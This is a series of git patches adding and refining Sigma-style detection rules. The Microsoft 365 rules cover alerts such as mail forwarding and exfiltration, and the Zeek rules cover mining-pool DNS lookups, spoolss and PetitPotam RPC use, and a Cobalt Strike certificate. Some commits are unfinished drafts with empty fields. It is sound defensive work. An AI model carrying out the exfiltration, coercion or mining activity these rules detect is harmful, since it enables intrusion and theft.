1 file changed, 24 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml new file mode 100644 index 00000000..5bcdf480 --- /dev/null +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Suspicious inbox manipulation rules +id: d2001772-f43f-4def-86d3-a9d5c47588c0 +status: experimental +description: Detects when a Microsoft Cloud App Security reported for suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Suspicious inbox manipulation rules" + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.exfiltration + - attack.t1020.001 \ No newline at end of file From 7d211f2487977101b40188a5252bea4d45f5a945 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 17:33:00 +0000 Subject: [PATCH 0516/1367] Data exfiltration to unsanctioned apps --- ..._data_exfiltration_to_unsanctioned_app.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml diff --git a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml new file mode 100644 index 00000000..1c645f00 --- /dev/null +++ b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Data exfiltration to unsanctioned apps +id: 2b669496-d215-47d8-bd9a-f4a45bf07cda +status: experimental +description: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Data exfiltration to unsanctioned apps" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.exfiltration + - attack.t1537 \ No newline at end of file From 1834324a160efd896ae3727ed243add9e53d1535 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 17:33:57 +0000 Subject: [PATCH 0517/1367] Update --- .../m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml index 1c645f00..0d55777d 100644 --- a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml +++ b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml @@ -8,7 +8,7 @@ references: - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: - category: + category: ThreatManagement service: m365 detection: selection: From 23e96712f8f0b75d9cf110c8faae4a0821969c8f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 12:59:44 -0500 Subject: [PATCH 0518/1367] Update microsoft365_data_exfiltration_to_unsanctioned_app.yml --- .../microsoft365_data_exfiltration_to_unsanctioned_app.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml index 0d55777d..a758f328 100644 --- a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml +++ b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Data exfiltration to unsanctioned apps +title: Microsoft 365 Data exfiltration to unsanctioned apps id: 2b669496-d215-47d8-bd9a-f4a45bf07cda status: experimental description: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. @@ -21,4 +21,4 @@ falsepositives: level: medium tags: - attack.exfiltration - - attack.t1537 \ No newline at end of file + - attack.t1537 From 3d151ef9f11255ac582c14e4797cebfb0dacedb8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 12:59:53 -0500 Subject: [PATCH 0519/1367] Update microsoft365_logon_from_risky_ip_address.yml --- rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml index 0530dbcf..f841b3dd 100644 --- a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml +++ b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Log on from a risky IP address +title: Microsoft 365 Log on from a risky IP address id: c191e2fa-f9d6-4ccf-82af-4f2aba08359f status: experimental description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. @@ -21,4 +21,4 @@ falsepositives: level: medium tags: - attack.initial_access - - attack.t1078 \ No newline at end of file + - attack.t1078 From b00e1772b3acd7c45ab24eed490381a4d2009dde Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 14:03:38 -0400 Subject: [PATCH 0520/1367] added logic and usage rule logic should be endswith. match zeek fields for `fields` section add false positive information --- rules/network/zeek/zeek_dns_mining_pools.yml | 27 +++++++++++++++----- 1 file changed, 20 insertions(+), 7 deletions(-) diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index c43795db..8be5222b 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -1,11 +1,11 @@ title: DNS Events Related To Mining Pools id: bf74135c-18e8-4a72-a926-0e4f47888c19 -description: Identifies IPs that may be performing DNS lookups associated with common currency mining pools. +description: Identifies clients that may be performing DNS lookups associated with common currency mining pools. references: - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_Miners.yaml date: 2021/08/19 -author: Saw Winn Naung , Azure-Sentinel -level: medium +author: Saw Winn Naung, Azure-Sentinel, @neu5ron +level: low logsource: service: dns product: zeek @@ -15,7 +15,7 @@ tags: - attack.t1496 detection: selection: - query: + query|endswith: - "monerohash.com" - "do-dear.com" - "xmrminerpro.com" @@ -82,10 +82,23 @@ detection: - "crypto-pools.org" - "monero.net" - "backup-pool.com" - - "mooo.com" + - "mooo.com" # Dynamic DNS, may want to exclude - "freeyy.me" - "cryptonight.net" - "shscrypto.net" - condition: selection + exclude_answers: + answers: + - "127.0.0.1" + - "0.0.0.0" + exclude_rejected: + rejected: "true" + condition: selection and not (exclude_answers OR exclude_rejected) +falsepositives: | + A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is "host" and ssl/tls is "server_name". fields: - - clientip + - id.orig_h + - id.resp_h + - query + - answers + - qtype_name + - rcode_name From feb7d0e187d2a6276d2b1ecbd0c2f8713d683bb8 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 14:11:04 -0400 Subject: [PATCH 0521/1367] Update zeek_dns_mining_pools.yml --- rules/network/zeek/zeek_dns_mining_pools.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index 8be5222b..91d87824 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -93,8 +93,8 @@ detection: exclude_rejected: rejected: "true" condition: selection and not (exclude_answers OR exclude_rejected) -falsepositives: | - A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is "host" and ssl/tls is "server_name". +falsepositives: + - A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is "host" and ssl/tls is "server_name". fields: - id.orig_h - id.resp_h From 1819e4b02b6654101f9767880a102c2fbbd492be Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 14:12:50 -0400 Subject: [PATCH 0522/1367] improve rule - improve rule logic - match zeek fields for fields section - add false positive information - change rule name to match the logic of the original rule.. Rule said "first" seen, however, no logic that matches that (ie: rare, stacking, etc..) --- .../zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml b/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml index dfa15acb..a8853b8e 100644 --- a/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml +++ b/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml @@ -1,7 +1,7 @@ -title: First Time Seen Remote Named Pipe - Zeek +title: SMB Spoolss Name Piped Usage id: bae2865c-5565-470d-b505-9496c87d0c30 description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled. -author: OTR (Open Threat Research) +author: OTR (Open Threat Research), @neu5ron references: - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 - https://dirkjanm.io/a-different-way-of-abusing-zerologon/ @@ -9,15 +9,15 @@ references: tags: - attack.lateral_movement - attack.t1021.002 -date: 2018/11/28 +date: 2021/08/23 logsource: product: zeek service: smb_files detection: selection: - path: \\*\IPC$ + path|endswith: IPC$ name: spoolss condition: selection falsepositives: - - 'Domain Controllers acting as printer servers too? :)' -level: medium \ No newline at end of file + - Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too +level: medium From cfc32e595063433349fd9f4a5d56f1f4e34b0d10 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 14:16:55 -0400 Subject: [PATCH 0523/1367] correct fields for zeek_rdp_public_listener.yml correct zeek fields for `fields` section. improve false positives information --- rules/network/zeek/zeek_rdp_public_listener.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/network/zeek/zeek_rdp_public_listener.yml b/rules/network/zeek/zeek_rdp_public_listener.yml index f5e9be21..c0b70992 100644 --- a/rules/network/zeek/zeek_rdp_public_listener.yml +++ b/rules/network/zeek/zeek_rdp_public_listener.yml @@ -38,8 +38,8 @@ detection: #- x.x.x.x condition: not selection #and not approved_rdp fields: - - src_ip - - dst_ip + - id.orig_h + - id.resp_h falsepositives: - - none + - Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet. level: high From 064d7b7b9f7a8bfd7cd990ab5bd6370944390b45 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 14:23:41 -0400 Subject: [PATCH 0524/1367] improve rule logic zeek_default_cobalt_strike_certificate.yml zeek logging for `certificate.serial` is all letters are capitalized --- rules/network/zeek/zeek_default_cobalt_strike_certificate.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml b/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml index a4e69cc5..97460495 100644 --- a/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml +++ b/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml @@ -2,7 +2,7 @@ title: Default Cobalt Strike Certificate id: 7100f7e3-92ce-4584-b7b7-01b40d3d4118 description: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic author: Bhabesh Raj -date: 2021/06/23 +date: 2021/08/26 references: - https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468 tags: @@ -13,7 +13,7 @@ logsource: service: x509 detection: selection: - certificate.serial: 8bb00ee + certificate.serial: 8BB00EE condition: selection fields: - san.dns From 41786a1b63bf6a8f7b042c354ee552bd050fb84a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 18:55:29 +0000 Subject: [PATCH 0525/1367] In-Progress --- ...crosoft365_activity_by_terminated_user.yml | 24 +++++++++++++++++++ ...ft365_activity_from_infrequent_country.yml | 24 +++++++++++++++++++ ...icrosoft365_activity_from_ip_addresses.yml | 24 +++++++++++++++++++ ...rosoft365_from_suspicious_ip_addresses.yml | 24 +++++++++++++++++++ ...crosoft365_suspicious_inbox_forwarding.yml | 24 +++++++++++++++++++ ...ous_oauth_app_file_download_activities.yml | 24 +++++++++++++++++++ 6 files changed, 144 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_activity_by_terminated_user.yml create mode 100644 rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml create mode 100644 rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml create mode 100644 rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml create mode 100644 rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml create mode 100644 rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml diff --git a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml new file mode 100644 index 00000000..d79cd373 --- /dev/null +++ b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Activity performed by terminated user +id: +status: experimental +description: Detects when a Microsoft Cloud App Security reported +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Activity performed by terminated user" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.exfiltration + - attack.t1537 \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml new file mode 100644 index 00000000..6aa39b32 --- /dev/null +++ b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Activity from infrequent country +id: +status: experimental +description: Detects when a Microsoft Cloud App Security reported +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Activity from infrequent country" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.initial_access + - \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml new file mode 100644 index 00000000..9b770204 --- /dev/null +++ b/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Activity from anonymous IP addresses +id: +status: experimental +description: Detects when a Microsoft Cloud App Security reported +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Activity from anonymous IP addresses" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.initial_access + - \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml new file mode 100644 index 00000000..208a9de3 --- /dev/null +++ b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Activity from suspicious IP addresses +id: +status: experimental +description: Detects when a Microsoft Cloud App Security reported +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Activity from suspicious IP addresses" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.initial_access + - \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml new file mode 100644 index 00000000..7ae798f7 --- /dev/null +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - +id: +status: experimental +description: Detects when a Microsoft Cloud App Security reported +author: Austin Songer @austinsonger +date: 2021/08/22 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Suspicious inbox forwarding" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.initial_access + - \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml new file mode 100644 index 00000000..3c748083 --- /dev/null +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - +id: +status: experimental +description: Detects when a Microsoft Cloud App Security reported +author: Austin Songer @austinsonger +date: 2021/08/22 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Suspicious OAuth app file download activities" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.initial_access + - \ No newline at end of file From 8e4b8f45dd75a6911aec3ca5487982ae560da388 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 18:57:17 +0000 Subject: [PATCH 0526/1367] Update --- rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml | 2 +- ...crosoft365_suspicious_oauth_app_file_download_activities.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml index 7ae798f7..7f328a98 100644 --- a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - +title: Microsoft 365 - Suspicious inbox forwarding id: status: experimental description: Detects when a Microsoft Cloud App Security reported diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index 3c748083..d743264e 100644 --- a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - +title: Microsoft 365 - Suspicious OAuth app file download activities id: status: experimental description: Detects when a Microsoft Cloud App Security reported From b255586117bba130ef69e84f465d269c030d5d71 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 14:59:06 -0400 Subject: [PATCH 0527/1367] condition fix and add fields should be `operation` not `endpoint` for the detection logic. added various fields useful for investigation --- ...zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml index c50ceb51..52cae554 100644 --- a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml +++ b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml @@ -20,10 +20,18 @@ logsource: service: dce_rpc detection: efs_operation: - endpoint|startswith: + operation|startswith: - 'Efs' - 'efs' condition: efs_operation falsepositives: - Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description). level: medium +fields: + - id.orig_h + - id.resp_h + - id.resp_p + - operation + - endpoint + - named_pipe + - uid From 4ab9519546102984137cdc8252a5275f5e6c22b4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 18:59:07 +0000 Subject: [PATCH 0528/1367] Update --- rules/cloud/m365/microsoft365_activity_by_terminated_user.yml | 2 +- .../m365/microsoft365_activity_from_infrequent_country.yml | 2 +- rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml | 2 +- rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml | 2 +- rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml | 2 +- ...crosoft365_suspicious_oauth_app_file_download_activities.yml | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml index d79cd373..4b60b111 100644 --- a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml +++ b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml @@ -1,5 +1,5 @@ title: Microsoft 365 - Activity performed by terminated user -id: +id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee status: experimental description: Detects when a Microsoft Cloud App Security reported author: Austin Songer @austinsonger diff --git a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml index 6aa39b32..6e161f7d 100644 --- a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml +++ b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -1,5 +1,5 @@ title: Microsoft 365 - Activity from infrequent country -id: +id: 0f2468a2-5055-4212-a368-7321198ee706 status: experimental description: Detects when a Microsoft Cloud App Security reported author: Austin Songer @austinsonger diff --git a/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml index 9b770204..ac34cd56 100644 --- a/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml @@ -1,5 +1,5 @@ title: Microsoft 365 - Activity from anonymous IP addresses -id: +id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 status: experimental description: Detects when a Microsoft Cloud App Security reported author: Austin Songer @austinsonger diff --git a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml index 208a9de3..36f5e305 100644 --- a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml @@ -1,5 +1,5 @@ title: Microsoft 365 - Activity from suspicious IP addresses -id: +id: a3501e8e-af9e-43c6-8cd6-9360bdaae498 status: experimental description: Detects when a Microsoft Cloud App Security reported author: Austin Songer @austinsonger diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml index 7f328a98..5f349d2d 100644 --- a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml @@ -1,5 +1,5 @@ title: Microsoft 365 - Suspicious inbox forwarding -id: +id: 6c220477-0b5b-4b25-bb90-66183b4089e8 status: experimental description: Detects when a Microsoft Cloud App Security reported author: Austin Songer @austinsonger diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index d743264e..d795148d 100644 --- a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -1,5 +1,5 @@ title: Microsoft 365 - Suspicious OAuth app file download activities -id: +id: ee111937-1fe7-40f0-962a-0eb44d57d174 status: experimental description: Detects when a Microsoft Cloud App Security reported author: Austin Songer @austinsonger From 1fa32fcd1a764127bab1c5e4fb8410c19b9d663f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:02:47 +0000 Subject: [PATCH 0529/1367] Update --- .../microsoft365_suspicious_inbox_forwarding.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml index 5f349d2d..e583f123 100644 --- a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml @@ -1,14 +1,14 @@ title: Microsoft 365 - Suspicious inbox forwarding id: 6c220477-0b5b-4b25-bb90-66183b4089e8 status: experimental -description: Detects when a Microsoft Cloud App Security reported +description: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. author: Austin Songer @austinsonger date: 2021/08/22 references: - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: - category: + category: ThreatManagement service: m365 detection: selection: @@ -17,8 +17,8 @@ detection: status: success condition: selection falsepositives: - - -level: medium + - Unknown +level: low tags: - - attack.initial_access - - \ No newline at end of file + - attack.exfiltration + - attack.t1020 \ No newline at end of file From 595bd3b80f34a2d997f013be2a4bf890818c7956 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:07:09 +0000 Subject: [PATCH 0530/1367] Updated --- .../m365/microsoft365_activity_by_terminated_user.yml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml index 4b60b111..037dcd00 100644 --- a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml +++ b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml @@ -1,7 +1,7 @@ title: Microsoft 365 - Activity performed by terminated user id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee status: experimental -description: Detects when a Microsoft Cloud App Security reported +description: Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. author: Austin Songer @austinsonger date: 2021/08/23 references: @@ -17,8 +17,7 @@ detection: status: success condition: selection falsepositives: - - + - Unknown level: medium tags: - - attack.exfiltration - - attack.t1537 \ No newline at end of file + - attack.impact \ No newline at end of file From da69b2f531332e072be94a75e8ca525db9bc82b4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:09:27 +0000 Subject: [PATCH 0531/1367] Update --- ..._suspicious_oauth_app_file_download_activities.yml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index d795148d..91cbe32c 100644 --- a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -1,14 +1,14 @@ title: Microsoft 365 - Suspicious OAuth app file download activities id: ee111937-1fe7-40f0-962a-0eb44d57d174 status: experimental -description: Detects when a Microsoft Cloud App Security reported +description: Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. author: Austin Songer @austinsonger -date: 2021/08/22 +date: 2021/08/23 references: - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: - category: + category: ThreatManagement service: m365 detection: selection: @@ -17,8 +17,7 @@ detection: status: success condition: selection falsepositives: - - + - Unknown level: medium tags: - - attack.initial_access - - \ No newline at end of file + - attack.exfiltration \ No newline at end of file From 754158bfd24c2c0dd965a8ebadcb132df33e9e9d Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:18:12 +0000 Subject: [PATCH 0532/1367] Update --- 